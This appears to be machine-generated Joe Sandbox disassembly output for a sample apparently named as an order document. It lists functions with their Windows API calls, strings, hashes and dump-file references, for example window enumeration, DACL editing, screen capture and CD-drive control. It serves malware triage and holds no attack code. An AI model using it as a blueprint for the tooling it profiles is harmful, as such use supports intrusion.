COLLAPSE, xrefs: 0046728D
GETTEXT, xrefs: 00467382
ISCHECKED, xrefs: 004673B2
GETSELECTED, xrefs: 0046733F
EXISTS, xrefs: 004672B0
CHECK, xrefs: 00467267
UNCHECK, xrefs: 0046740B
SELECT, xrefs: 004673E0
GETITEMCOUNT, xrefs: 00467311
GETTOTALCOUNT, xrefs: 0046722A

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: c43a8db48d506da04349dcc3429b041c4a2109f0e3aab1f999f6c73bd108a0ab
Instruction ID: 62f23ba057e46a8cd31ddd049ddfa486710c51c13ab62974974121bb26b3cf57
Opcode Fuzzy Hash: c43a8db48d506da04349dcc3429b041c4a2109f0e3aab1f999f6c73bd108a0ab
Instruction Fuzzy Hash: 319156742047019BCB04EF21C851A6EB7A1AF54318F10885FFC9667393EB38ED46DB9A

Function 0043CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0043CF50), ref: 0043CE90

Strings

NAME, xrefs: 0043CCC2
INSTANCE, xrefs: 0043CD9E
TEXT, xrefs: 0043CDC7
T+K, xrefs: 0043CD72
P+K, xrefs: 0043CD43
H+K, xrefs: 0043CCE8
CLASSNN, xrefs: 0043CC33
L+K, xrefs: 0043CD14
4+K, xrefs: 0043CC96
CLASS, xrefs: 0043CC10
REGEXPCLASS, xrefs: 0043CC56

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ChildEnumWindows
String ID: 4+K$CLASS$CLASSNN$H+K$INSTANCE$L+K$NAME$P+K$REGEXPCLASS$T+K$TEXT
API String ID: 3555792229-3796589855
Opcode ID: f5336044610378011e699409c7135cc5052163c0afa7251a4617bbdd594075d5
Instruction ID: 2ed9d666b05899a5a0bbc8a2e6994f38106217aeede367c2b80ce34893bae7f9
Opcode Fuzzy Hash: f5336044610378011e699409c7135cc5052163c0afa7251a4617bbdd594075d5
Instruction Fuzzy Hash: 109176706005069BCB18EF61C4C2BDAFB75BF08304F50952BD859B7291DF38699AD7D8

Function 0046E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0046E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00469808,?), ref: 0046E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0046E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0046E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0046E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,00469808,?), ref: 0046E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0046E6DF
DestroyIcon.USER32(?), ref: 0046E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0046E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0046E717

Part of subcall function 00420FA7: __wcsicmp_l.LIBCMT ref: 00421030

Strings

.dll, xrefs: 0046E564
.icl, xrefs: 0046E521
.exe, xrefs: 0046E541

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: f248247dba35af049fc174e46d4a9f5f6c395263414642daa45a234f2940bab6
Instruction ID: 362906a6200e291847826ad6f58851427a409ccbfe03941b9f9efc8c3e9874fa
Opcode Fuzzy Hash: f248247dba35af049fc174e46d4a9f5f6c395263414642daa45a234f2940bab6
Instruction Fuzzy Hash: CC61D171900215FAEB14DF66CC46FBE77E8BB08724F10451BF911E61D1EBB8A980CB68

Function 0045091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 004509DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 004509EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004509FB
__wsplitpath.LIBCMT ref: 00450A59
_wcscat.LIBCMT ref: 00450A71
_wcscat.LIBCMT ref: 00450A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00450A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00450AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00450ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00450AFF
_wcscpy.LIBCMT ref: 00450B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00450B4A

Strings

*.*, xrefs: 00450B05

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 2d0a0b81136769988e18dfd9554f1fc92bd9ec7e6ba6f0201e502796036e3357
Instruction ID: 10903c0e40f5f07e0d65feee08a32dd417e8c6966a873cd766c0314ba11f90b5
Opcode Fuzzy Hash: 2d0a0b81136769988e18dfd9554f1fc92bd9ec7e6ba6f0201e502796036e3357
Instruction Fuzzy Hash: E36179B65043059FD710EF61C88099EB3E8FF89314F04492EF989D3252DB39E949CB9A

Function 0044D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

CharLowerBuffW.USER32(?,?), ref: 0044D292
GetDriveTypeW.KERNEL32 ref: 0044D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044D38C

Strings

open , xrefs: 0044D2EE
set cd door , xrefs: 0044D32D
open, xrefs: 0044D2B9
close cd wait, xrefs: 0044D377
wait, xrefs: 0044D349
closed, xrefs: 0044D2A6, 0044D2AF
close, xrefs: 0044D298
type cdaudio alias cd wait, xrefs: 0044D30A

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: d8839ad3d2d06dc149498d3a141f81d8065c88dc0fc088a9d89c3af58049b518
Instruction ID: c2f07575d900e2cc802aa525a9fa0d83b75d0ad0639a96e5e284e948a2682b64
Opcode Fuzzy Hash: d8839ad3d2d06dc149498d3a141f81d8065c88dc0fc088a9d89c3af58049b518
Instruction Fuzzy Hash: 6F514F715043059FC700EF22D9819AEB7E4FF98718F10896EF88667291DB35EE05CB96

Function 004426BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00473973,00000016,0000138C,00000016,?,00000016,0049DDB4,00000000,?), ref: 004426F1
LoadStringW.USER32(00000000,?,00473973,00000016), ref: 004426FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00473973,00000016,0000138C,00000016,?,00000016,0049DDB4,00000000,?,00000016), ref: 0044271C
LoadStringW.USER32(00000000,?,00473973,00000016), ref: 0044271F
__swprintf.LIBCMT ref: 0044276F
__swprintf.LIBCMT ref: 00442780
_wprintf.LIBCMT ref: 00442829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00442840

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00442824
^ ERROR, xrefs: 004427D5
Line %d (File "%s"):, xrefs: 00442769
Line %d:, xrefs: 0044277A
Error: , xrefs: 004427F7

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: ff08b60d36110bbdc17b2dae7c2dc98cc04ea29afcc34cebbcfd9309ab3ad4e0
Instruction ID: b3eca28f86436021008a970bdb09a16546556c442e301ca44879bea502f66036
Opcode Fuzzy Hash: ff08b60d36110bbdc17b2dae7c2dc98cc04ea29afcc34cebbcfd9309ab3ad4e0
Instruction Fuzzy Hash: 96413172800118AADB14FBD2DE86EEF7778AF54344F50017AB501760D2EA786F09CBA8

Function 004387CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 0043882D
___wtomb_environ.LIBCMT ref: 0043884F

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

__malloc_crt.LIBCMT ref: 00438875
__malloc_crt.LIBCMT ref: 00438892
_free.LIBCMT ref: 004388C9
__recalloc_crt.LIBCMT ref: 00438902
__recalloc_crt.LIBCMT ref: 00438947
_strlen.LIBCMT ref: 00438973
__calloc_crt.LIBCMT ref: 0043897D
_strlen.LIBCMT ref: 0043898C
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 004389BA
_free.LIBCMT ref: 004389D4
_free.LIBCMT ref: 004389E1
_free.LIBCMT ref: 004389F3
__invoke_watson.LIBCMT ref: 00438A0D

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 79ee96305396753ec85209681d44d1c599e85df0d650f1d95a5e513564eeec92
Instruction ID: f8a6bcba9f3a51b7e045a40f257f054e452096192a264bb209ba44541f6a6878
Opcode Fuzzy Hash: 79ee96305396753ec85209681d44d1c599e85df0d650f1d95a5e513564eeec92
Instruction Fuzzy Hash: 5961E5B2500311EFEB246F26DC41B7AB7A4AF58324F64252FF801AA2D1DF3DD941869D

Function 0046E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0046E754
GetFileSize.KERNEL32(00000000,00000000), ref: 0046E76B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 0046E776
CloseHandle.KERNEL32(00000000), ref: 0046E783
GlobalLock.KERNEL32(00000000), ref: 0046E78C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0046E79B
GlobalUnlock.KERNEL32(00000000), ref: 0046E7A4
CloseHandle.KERNEL32(00000000), ref: 0046E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0046E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0048D9BC,?), ref: 0046E7D5
GlobalFree.KERNEL32(00000000), ref: 0046E7E5
GetObjectW.GDI32(?,00000018,000000FF), ref: 0046E809
CopyImage.USER32(?,00000000,?,?,00002000), ref: 0046E834
DeleteObject.GDI32(00000000), ref: 0046E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0046E872

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: ee3b4eaa2bb00717be7c8dd40cc1e730c2c539aaab15d6c983e34c33c2c99168
Instruction ID: bbe379a3d369c15808953ba8d2511d5ef9f42df1505e87a7dc6f0ce051fe7f67
Opcode Fuzzy Hash: ee3b4eaa2bb00717be7c8dd40cc1e730c2c539aaab15d6c983e34c33c2c99168
Instruction Fuzzy Hash: E0415975A01208EFDB11AF65CC88EAF7BB8EF89725F104469F906D72A0D7349D41CB25

Function 004505F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0045076F
_wcscat.LIBCMT ref: 00450787
_wcscat.LIBCMT ref: 00450799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004507AE
SetCurrentDirectoryW.KERNEL32(?), ref: 004507C2
GetFileAttributesW.KERNEL32(?), ref: 004507DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 004507F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00450806

Strings

*.*, xrefs: 00450845

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: ff5e0aed43fc8de9fb838faa9418ce3fd369cb65696d28d22a61ac5ec733e13f
Instruction ID: 7bdd4fe60b36691808eedc24269dbd53bee5a982b2c8d40390e9c2bde986c826
Opcode Fuzzy Hash: ff5e0aed43fc8de9fb838faa9418ce3fd369cb65696d28d22a61ac5ec733e13f
Instruction Fuzzy Hash: 7D818E755043019FCB24EF24C84596FB3E8BB88305F148C2FFC85D7252EA38E9598B9A

Function 0046EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0046EF3B
GetFocus.USER32 ref: 0046EF4B
GetDlgCtrlID.USER32(00000000), ref: 0046EF56
_memset.LIBCMT ref: 0046F081
GetMenuItemInfoW.USER32 ref: 0046F0AC
GetMenuItemCount.USER32(00000000), ref: 0046F0CC
GetMenuItemID.USER32(?,00000000), ref: 0046F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0046F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0046F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0046F193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0046F1C8

Strings

0, xrefs: 0046F079

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 9799dd3d1ee4828a97f54c740ca34035a40e28c7b9c14404954c9a3d01e4e68f
Instruction ID: fd95b6122f1952d93dd32aac1146559e7f8eb789f171782a5aa65823d75a237c
Opcode Fuzzy Hash: 9799dd3d1ee4828a97f54c740ca34035a40e28c7b9c14404954c9a3d01e4e68f
Instruction Fuzzy Hash: 87817974605301AFD710CF15D884AABBBE9FB89358F00492FF99497291E738DD09CB9A

Function 0043A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0043ABD7
Part of subcall function 0043ABBB: GetLastError.KERNEL32(?,0043A69F,?,?,?), ref: 0043ABE1
Part of subcall function 0043ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0043A69F,?,?,?), ref: 0043ABF0
Part of subcall function 0043ABBB: HeapAlloc.KERNEL32(00000000,?,0043A69F,?,?,?), ref: 0043ABF7
Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043AC0E

Part of subcall function 0043AC56: GetProcessHeap.KERNEL32(00000008,0043A6B5,00000000,00000000,?,0043A6B5,?), ref: 0043AC62
Part of subcall function 0043AC56: HeapAlloc.KERNEL32(00000000,?,0043A6B5,?), ref: 0043AC69
Part of subcall function 0043AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0043A6B5,?), ref: 0043AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0043A8CB
_memset.LIBCMT ref: 0043A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0043A8FF
GetLengthSid.ADVAPI32(?), ref: 0043A910
GetAce.ADVAPI32(?,00000000,?), ref: 0043A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0043A969
GetLengthSid.ADVAPI32(?), ref: 0043A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0043A995
HeapAlloc.KERNEL32(00000000), ref: 0043A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0043A9BD
CopySid.ADVAPI32(00000000), ref: 0043A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0043A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0043AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0043AA2F

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: bf7c28dd186497545c2042e8706342816a1cb9ee0fceefb4c30e9748a26ccecd
Instruction ID: a5b523d4b2b3644710638cbaf41432f6dd7c5ae5a535f21993417544a1ff56ad
Opcode Fuzzy Hash: bf7c28dd186497545c2042e8706342816a1cb9ee0fceefb4c30e9748a26ccecd
Instruction Fuzzy Hash: 4D518EB1900209AFCF00DF91DD44EEEBBB9FF09304F04952AF951A7290DB399A15CB65

Function 00459DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00459E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00459E42
CreateCompatibleDC.GDI32(?), ref: 00459E4E
SelectObject.GDI32(00000000,?), ref: 00459E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00459EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00459EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00459F0F
SelectObject.GDI32(00000006,?), ref: 00459F17
DeleteObject.GDI32(?), ref: 00459F20
DeleteDC.GDI32(00000006), ref: 00459F27
ReleaseDC.USER32(00000000,?), ref: 00459F32

Strings

(, xrefs: 00459ED7

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 2e7f96aac58d06ceed8016184da46fc02c74b3b537f0128d40fd7e78954cd11c
Instruction ID: ff36a946c1fa3f61be2849ebd6c04ad23be7e1f3909c0534f738ab968e2dd062
Opcode Fuzzy Hash: 2e7f96aac58d06ceed8016184da46fc02c74b3b537f0128d40fd7e78954cd11c
